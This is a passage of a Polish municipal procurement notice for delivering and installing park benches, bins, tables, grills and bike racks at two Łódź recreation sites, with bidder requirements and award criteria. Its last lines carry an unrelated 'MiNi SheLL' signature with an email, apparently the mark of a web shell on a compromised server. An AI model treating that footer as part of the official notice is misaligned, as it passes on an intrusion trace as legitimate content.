8.7. W przypadku składania przez Wykonawcę wadium w formie poręczenia lub gwarancji, Zamawiający nie uzna dokumentów, które nie spełniają wymagań, o których mowa w pkt. 8.6 SIWZ.
8.8. Wykonawca, który nie wniesie wadium zostanie przez Zamawiającego wykluczony na podstawie art. 24 ust. 2 pkt 2 ustawy Pzp.
8.9. Zamawiający zatrzyma wadium, lub dokona jego zwrotu na zasadach określonych w art. 46 ustawy Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie 	Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>5.1.2.1. Dotyczy części 1 i 2: Wykonawca musi udokumentować realizację dostaw w ciągu ostatnich trzech lat poprzedzających dzień  złożenia ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwóch dostaw elementów małej architektury wraz z ich montażem (w szczególności ławek) o łącznej wartości minimum  50.000 zł., odpowiadających swoim rodzajem przedmiotowi dostawy stanowiącemu przedmiot niniejszego zamówienia. Zrealizowanie powyższego musi być udokumentowane referencjami wystawionymi przez Zamawiających, potwierdzającymi, że realizacja dostaw została wykonana w terminie i z należytą starannością, zgodnie 
z opisem zamówienia. 
5.1.2.2. Dotyczy części 3: Wykonawca musi udokumentować realizację dostaw w ciągu ostatnich trzech lat poprzedzających dzień  złożenia ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwóch dostaw elementów małej architektury wraz z ich montażem (w szczególności ławek) o łącznej wartości minimum  20.000 zł., odpowiadających swoim rodzajem przedmiotowi dostawy stanowiącemu przedmiot niniejszego zamówienia. Zrealizowanie powyższego musi być udokumentowane referencjami wystawionymi przez Zamawiających, potwierdzającymi, że realizacja dostaw została wykonana w terminie i z należytą starannością, zgodnie z opisem zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>6.4.1.1. fotografie produktów odzwierciedlające ich faktyczny stan wizualny, 
6.4.1.2. szczegółowy opis proponowanych produktów, parametry, wymiary, dane techniczne,
6.4.1.3. instrukcję sposobu montażu.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres rękojmi - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://mosirl.bip.eur.pl/public/?id=100855<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Sportu i Rekreacji w Łodzi, ul. ks. Ignacego Skorupki 21, 90-532 Łódź, pokój nr 020, parter (Dział Techniczno-Inwestycyjny).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.05.2016 godzina 09:55, miejsce: Miejski Ośrodek Sportu i Rekreacji w Łodzi, ul. ks. Ignacego Skorupki 21, 90-532 Łódź, pokój nr 203, II piętro (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa i montaż elementów małej architektury na obiektach rekreacyjnych Młynek i Stawy Jana.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje dostawę i montaż:
1. ławka betonowa - 25 szt. o następujących parametrach:
a) ławki do wkopania w podłożu nieutwardzonym (głębokość wkopania minimum 40 cm);
b) podstawy wykonane z wysokogatunkowego betonu  płukanego z fakturą zewnętrzną grysu granitowego klasy minimum B30; 
c) siedzisko i oparcie wykonane z desek drzewa liściastego lub egzotycznego o grubości minimum 4 cm, zabezpieczonych przed działaniem korozji biologicznej malowane lakierobejcą do wymalowań zewnętrznych w kolorze orzech ciemny;
d) wymiary:
	- długość całkowita: 205 cm (+/-2 cm),
	- wysokość siedziska po wkopaniu: 42 cm (+/-2 cm),
	- wysokość oparcia po wkopaniu: 80 cm (+/-2 cm),
	- długość siedziska (części drewnianej): 180cm (+/-2 cm),
	- głębokość siedziska 46 cm (+/-2 cm),
	- ciężar ławki: minimum 150 kg;
e) elementy stalowe ławki zabezpieczone antykorozyjne i malowane na czarno lub wykonane ze stali ocynkowanej ogniowo.
Sposób montażu: Ławkę należy trwale zamocować poprzez wkopanie jej w gruncie
i posadowienie jej na ławie cementowo-piaskowej o grubości minimum 15 cm, na wskazanym obiekcie. 
Do każdej ławki należy dostarczyć dodatkowo po jednym drewnianym elemencie siedziska, zabezpieczonym i malowanym w identyczny sposób, jak zamontowane w opisywanych ławkach.

2. kosz na odpadki - 22 szt. o następujących parametrach:
a) w podstawie trapez wykonany z wysokogatunkowego betonu płukanego,
z fakturą zewnętrzną z grysu granitowego klasy minimum B30;

b) pojemność minimum 70 l pojemności wkładu;
c) kosz wyposażony w daszek ze stali zabezpieczonej antykorozyjnie;
d) wymiary:
   	- szerokość 65/40 cm (+/-2 cm),
    	- wysokość z daszkiem 95 cm (+/-2 cm),
	- ciężar: minimum 250 kg
f) wkład wykonany z blachy ocynkowanej o grubości minimum 0,5 mm;
g) kosze montowane na podłożu nieutwardzonym w sposób stabilny.
 
Dodatkowo wraz z koszami należy dostarczyć trzy dodatkowe wkłady oraz trzy daszki malowane tak samo, jak zamawiane kosze. Wszystkie dodatkowe elementy muszą być zabezpieczone antykorozyjnie tak, jak w zamówieniu. 

3. kosz na psie odchody - 8 szt. o następujących parametrach:

a) elementy stalowe koszy zabezpieczone antykorozyjnie;
b) kosze wyposażone w odpowiednie oznaczenie określające jego przeznaczenie malowane w kolorze pomarańcz średni (RAL 2003);

c) otwory wrzutowe zabezpieczone ruchomą klapką;
d) wymiary:
- wysokość: 60 cm (+/-2 cm)
- średnica 35 cm (+/- 2 cm)
- zawieszony na wysokości 46 cm (+/- 2 cm)
e) powinny posiadać możliwość mocowania worka foliowego.

Sposób montażu: kosze wkopywane na głębokość minimum 50 cm, zabetonowane w podłożu lub przymocowane do betonowej prefabrykowanej stopy fundamentowej.

4. stół rekreacyjny - 4 szt. o następujących parametrach:
a) stół wykonany z wysokogatunkowego betonu płukanego z fakturą zewnętrzną z grysu granitowego klasy minimum B-30;
b) blat wykonany z szlifowanego betonu, lakierowany specjalnym lakierem zabezpieczającym jego powierzchnię przed wpływem warunków atmosferycznych;
c) krawędź stołu wykończona listwą z  polerowanego aluminium;
d) wymiary:
	- grubość blatu 8 cm (+/-1 cm), 
	- średnica blatu 120 cm (+/-2 cm), 
	- wysokość stołu 80 cm (+/-2 cm),
	- średnica całkowita 223 cm (+/-2 cm), 
	- poglądowe wymiary słupka prezentują rysunki.
e) siedziska wykonane z wysokogatunkowego betonu płukanego z fakturą zewnętrzną 
z grysu granitowego klasy minimum B-30;
f) siedziska w kształcie koła wykończone listwami drewnianymi o grubości minimum 4 cm wykonane z drewna liściastego lub egzotycznego zabezpieczonego przed działaniem korozji biologicznej,  malowane lakierobejcą do wymalowań zewnętrznych 
w kolorze orzech ciemny;
g) wszystkie elementy stalowe muszą być zabezpieczone środkami antykorozyjnymi i malowane w kolorze czarnym, lub wykonane ze stali ocynkowanej ogniowo.

Do każdego stołu należy dostarczyć po trzy dodatkowe drewniane klepki z każdego rodzaju występującego na  siedzisku o tych samych wymiarach, kolorze i sposobie impregnacji  jakie zostaną zastosowane w zamawianych stołach.

Sposób montażu: mocowany w podłożu  miękkim na prefabrykowanych stopach fundamentowych.

5. stojak na rowery - 4 szt. o parametrach zgodnych z Zarządzeniem nr 3303/V/09 Prezydenta Miasta Łodzi z dnia 25 czerwca 2009 r. w sprawie wprowadzenia wytycznych do planowania, projektowania i utrzymania dróg rowerowych w Łodzi:
a) kształt stojaków rowerowych możliwie prosty;
b) wykonywanie z trwałych materiałów, odpornych na wpływ warunków atmosferycznych (w tym przed korozją);
c) trwale przymocowane do podłoża;
d) wymaga się, aby stojaki dla rowerów, niezależnie od typu roweru, umożliwiały oparcie roweru oraz przypięcie do stojaka ramy i jednego koła roweru przy pomocy pojedynczego zapięcia typu U-lock (kłódką szeklową);
e) zaleca się także, aby jeden stojak dla rowerów umożliwiał przypięcie drugiego koła za pomocą drugiego zapięcia;
f) w kształcie odwróconej litery U, umożliwiający oparcie i przypięcie, co najmniej 2 rowerów niezależnie od rozmiaru ramy, szerokości opony czy też kształtu kierownicy;
g) wymiary:
- długość ok. 100 cm (+/- 2 cm), 
- wysokość 60-80 cm (+/-2 cm), 
- średnica rury 5-9 cm (+/-2 cm).

Miejsce dostawy i montażu: obiekt rekreacyjny Młynek, Łódź ul. Śląska 168..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.11.36.00-3, 34.92.84.80-6, 39.12.12.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.07.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres rękojmi - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa i montaż elementów małej architektury - na miejsce do grillowania, na obiekcie rekreacyjnym Młynek i Stawy Jana.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje dostawę i montaż:

1. stół parkowy - 6 szt. o następujących parametrach:
a) stół wykonany z wysokogatunkowego betonu płukanego z fakturą zewnętrzną z grysu granitowego klasy minimum B-30;
b) blat wykonany z szlifowanego betonu, lakierowany specjalnym lakierem zabezpieczającym jego powierzchnię przed wpływem warunków atmosferycznych;
c) krawędź stołu wykończona kątownikiem z  polerowanego aluminium;
d) wymiary:
	- grubość blatu 6 cm (+/- 1 cm),
	- blat 90x200 cm (+/- 2 cm),
	- wysokość stołu 78 cm (+/- 2 cm),
	- szerokość całkowita 200 cm (+/- 2 cm),
	- długość całkowita 200 cm (+/- 2 cm).
e) siedziska wykonane z trzech listew (na jednej ławie) drewnianych o grubości minimum 4 cm z drewna liściastego lub egzotycznego zabezpieczonego przed działaniem korozji biologicznej;
f) malowane lakierobejcą do wymalowań zewnętrznych w kolorze orzech ciemny;
g) wymiary:
	- szerokość ławy 40 cm (+/- 2 cm),
	- wysokość ławy 45  cm (+/- 2 cm); 
	h) wszystkie elementy stalowe muszą być zabezpieczone środkami antykorozyjnymi 
           i malowane w kolorze czarnym, lub wykonane ze stali ocynkowanej ogniowo.

Do każdego stołu należy dostarczyć po jednej drewnianej listwie siedziska o tych samych wymiarach, kolorze i sposobie impregnacji, jakie zostaną zastosowane w zamawianych stołach. 

Sposób montażu: mocowanie w podłożu miękkim na prefabrykowanych stopach fundamentowych za pomocą odpowiednich kołków rozporowych.

Miejsce dostawy i montażu:
- 3 sztuki należy dostarczyć i zamontować na obiekcie Stawy Jana Łódź, ul. Rzgowska 247;
- 3 sztuki należy dostarczyć i zamontować na obiekcie Młynek Łódź, ul. Śląska 168.

2.  ławka parkowa betonowa - 6 szt. o następujących parametrach:
a) ławki wykonane z wysokogatunkowego betonu płukanego z fakturą zewnętrzną z  grysu granitowego klasy minimum B-30;
b) ławka musi posiadać kształt przypominający wycinek koła; 
c) siedzisko wykonane z  listew drewnianych o grubości minimum 4 cm wykonane
z  drewna liściastego lub egzotycznego zabezpieczonego przed działaniem korozji biologicznej,  malowane lakierobejcą do wymalowań zewnętrznych w kolorze orzech ciemny;
d) wymiary:
	- szerokość ławki 43 cm (+/- 2 cm), 
	- wysokość ławki 45 cm (+/- 2 cm),
	- długość całkowita 157 cm (+/- 2 cm);
      e)  wszystkie elementy stalowe muszą być zabezpieczone środkami antykorozyjnymi i 	malowane w kolorze czarnym lub ocynkowane ogniowo.

Do każdej ławki należy dostarczyć po trzy drewniane listwy siedziska o tych samych wymiarach, kolorze i sposobie impregnacji, jakie zostaną zastosowane w zamawianych ławkach.
 
Miejsce dostawy i montażu: ławki należy dostarczyć i zamontować na obiekcie Młynek Łódź, ul. Śląska 168.

3. grill parkowy - 3 szt. o następujących parametrach:

a) grille wykonane z  wysokogatunkowego betonu płukanego z fakturą zewnętrzną z  grysu granitowego (dotyczy tylko blatu roboczego) klasy min. B-30;
b) pozostałe części urządzenia malowane farbami do podłoży betonowych;  
c) okrągłe palenisko grilla musi być wykonane z betonu odpornego na wysokie temperatury (około 1300°C);
d) nad paleniskiem umieszczony ma być okrągły ruszt z możliwością regulacji jego położenia nad paleniskiem;
e) wokół paleniska ma być umieszczony okrągły blat roboczy wykonany z betonu o fakturze zewnętrznej z grysu granitowego zabezpieczony przed uszkodzeniem krawędzi listwą z polerowanego aluminium;
f) wymiary:
	- minimalna wysokość blatu od podłoża 34 cm (+/- 2 cm),
	- średnica blatu 120 cm (+/- 2 cm),
	- wysokość urządzenia 175 cm (+/- 2 cm);
g)  wszystkie elementy stalowe zabezpieczone antykorozyjnie;
h)  w ramach dostawy należy dołączyć dodatkowo jeden ruszt wraz z łańcuchem, na którym jest zawieszony.

Miejsce dostawy i montażu: obiekt rekreacyjny Młynek, Łódź ul. Śląska 168.

4. kosz na popiół i odpadki z grilla - 6 szt. o następujących parametrach:
a) kosz na popiół z grilla o wymiarach 80x80x80 cm (+/-2 cm), wykonany z blachy stalowej zabezpieczonej antykorozyjnie malowany w kolorze RAL 2002 lub zbliżonym;
b) perforacja obudowy kosza ma zapewnić wszechstronną wentylację. Wokół  obudowy należy umieścić  napisy popiół z grilla;
c) napisy muszą być trwale połączone z obudową lub wycięte w ściankach obudowy;
d) obudowa kosza musi posiadać możliwość mocowania do podłoża utwardzonego, oraz centrowania stalowego wkładu;
e) pokrywa kosza wyposażona w otwór wrzutowy o średnicy 42 cm (+/- 2 cm), zabezpieczony kratką uniemożliwiającą wrzucanie większych odpadków, zamocowana na zawiasach przystosowana do zamknięcia na kłódkę;
f) parametry pojemnika wewnętrznego: 
- pojemnik wewnętrzny o wymiarach średnicy 45 cm (+/- 2 cm),
- wysokość 75 cm (+/- 2 cm);
- wykonany z blachy stalowej ocynkowanej lub malowany farbami odpornymi na wysokie temperatury w kolorze szarym.  

 Miejsce dostawy i montażu:
- 3 sztuki:  obiekt rekreacyjny Stawy Jana, Łódź ul. Rzgowska 247
- 3 sztuki:  obiekt rekreacyjny Młynek, Łódź ul. Śląska 168..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.11.36.00-3, 34.92.84.80-6, 39.12.12.00-8, 42.21.41.10-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.07.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres rękojmi - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa i montaż ławek metalowych na obiekcie rekreacyjnym Stawy Jana.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje dostawę i montaż:

1. skate ławka - 4 szt. o następujących parametrach: 
a) konstrukcja ławki wykonana ma być z rur stalowych o średnicy zewnętrznej 57 mm (+/-2 mm), grubość ścianki 2,9 mm (+/-0,2 mm);
b) stalowe elementy ławki ocynkowane ogniowo;
c) siedzisko ławki wykonane z rur stalowych ocynkowanych ogniowo o średnicy zewnętrznej 38 mm  (+/-2 mm), grubość ścianki 2,6 mm  (+/-0,2 mm);
d) podnóżek wykonany z rury stalowej ocynkowanej ogniowo o średnicy 38 mm (+/-2 mm), grubość ścianki 2,6 mm (+/-0,2 mm);
e) wszystkie końcówki rur zabezpieczone zaślepkami z tworzywa sztucznego;
f) wymiary:
- ławka o długości 150 cm (+/-2 cm), 
- siedzisko na wysokości 80 cm (+/-2 cm), 
- podnóżek na wysokości 46 cm (+/-2 cm).

Dodatkowo wraz z ławką należy dostarczyć trzy zapasowe zaślepki do rur siedziska. 

Sposób montażu: ławkę należy mocować trwale w gruncie przy pomocy prefabrykowanych stóp fundamentowych, lub w każdy inny sposób, który spowoduje pewne i stabilne mocowanie ławki z podłożem;

Miejsce dostawy i montażu: obiekt rekreacyjny Stawy Jana, Łódź ul. Rzgowska 247


2. skate ławka - 2 szt. o następujących parametrach: 
a) konstrukcja ławki wykonana ma być z rur stalowych o średnicy zewnętrznej 57 mm (+/-2 mm), grubość ścianki 2,9 mm (+/-0,2 mm);
b) stalowe elementy ławki ocynkowane ogniowo;
c) pomiędzy główną ramą ławki, która zrobiona jest z rur stalowych o średnicy zewnętrznej 57 mm (+/-2 mm), grubość ścianki 2,9 mm (+/-0,2 mm);
d) wbudowane jest siedzisko z rur stalowych ocynkowanych ogniowo o śr. zew. 38Mm (+/-2 mm), gr. ścianki 2,6mm (+/-0,2 mm);
e) wszystkie końcówki rur zabezpieczone zaślepkami z tworzywa sztucznego;
f) ławkę należy mocować trwale w gruncie metodą mokrą przez zalanie nóg ławki zaprawą betonową. 
g) poglądowe wymiary ławki prezentują rysunki;
h) montaż ławki musi zapewnić jej pewne trwałe i stabilne mocowanie  z podłożem;
i) do każdej  ławki należy dostarczyć trzy zapasowe zaślepki do rur siedziska. 

Miejsce dostawy i montażu:obiekt rekreacyjny Stawy Jana, Łódź ul. Rzgowska 247

3. słupek zabezpieczający - 5 szt. o następujących parametrach:
a) konstrukcja słupka wykonana ma być z rury stalowej ocynkowanej ogniowo średnicy zewnętrznej 76,1 mm (+/-2 mm) grubości ścianki 3,2 mm (+/-0,2 mm);
b) słupek  należy mocować trwale w gruncie metodą mokrą przez zalanie nóg słupka zaprawą betonową;
c) montaż słupka musi zapewnić mu pewne trwałe i stabilne mocowanie  z podłożem. 

Miejsce dostawy i montażu: obiekt rekreacyjny Stawy Jana, Łódź ul. Rzgowska 247

II. Wykonawca jest zobowiązany: 
1. dostarczyć i wykonać montaż przedmiotu Umowy Zamawiającemu do obiektu MOSiR w Łodzi, pod adresem wskazanym przez Zamawiającego, we wskazanych na obiekcie miejscach w terminie wskazanym w pkt. 4 SIWZ co strony potwierdzą pisemnie protokołem przekazania;
2. wykonać przedmiot umowy zgodnie z zasadami wiedzy technicznej oraz obowiązującymi przepisami;
3. w przypadku, gdy dostarczony przedmiot Umowy będzie niekompletny lub będzie zawierał wady, zostanie to odnotowane w Protokole odbioru, tym przypadku Wykonawca zobowiązany będzie w dodatkowym terminie, wyznaczonym przez Zamawiającego dostarczyć / wymienić na własny koszt przedmiot Umowy brakujący i / lub wolny od wad;
4. powiadomić Zamawiającego w terminie do 7 dni o planowanym terminie rozpoczęcia dostawy i montażu przedmiotu umowy;
5. udzielić Zamawiającemu potrzebnych informacji o stosunkach faktycznych i prawnych dotyczących towaru oraz wydać Zamawiającemu stosowne dokumenty;
6. w przypadku, gdy jest to niezbędne do prawidłowego korzystania, załączy informację dotyczącą sposobu korzystania;
7. wydać przedmiot umowy zgodnie z wymaganiami Zamawiającego;
8. w przypadku dostarczenia towaru uszkodzonego, złej jakości, wymienić je na własny koszt w terminie do 5 dni roboczych, przy czym Zamawiającemu przysługuje naliczenie kar umownych, o których mowa w § 5 projektu umowy;
9. udzielić na przedmiot umowy rękojmi na okres ... miesięcy zgodny ze złożonym formularzem ofertowym na elementy betonowe i stalowe oraz na okres 24 miesięcy na elementy drewniane, z wyłączeniem uszkodzeń mechanicznych powstałych w trakcie użytkowania;
10. do posiadania polisy ubezpieczeniowej, ważnej nie później niż od daty podpisania umowy do czasu odbioru końcowego obejmującej ubezpieczenie w pełnym zakresie od odpowiedzialności cywilnej kontraktowej w związku z realizacją niniejszej umowy, ubezpieczenie od zniszczenia wszelkiej własności spowodowanego działaniem, zaniechaniem lub niedopatrzeniem pracowników Wykonawcy w wysokości nie mniejszej niż wartość niniejszej umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.11.36.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres rękojmi - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com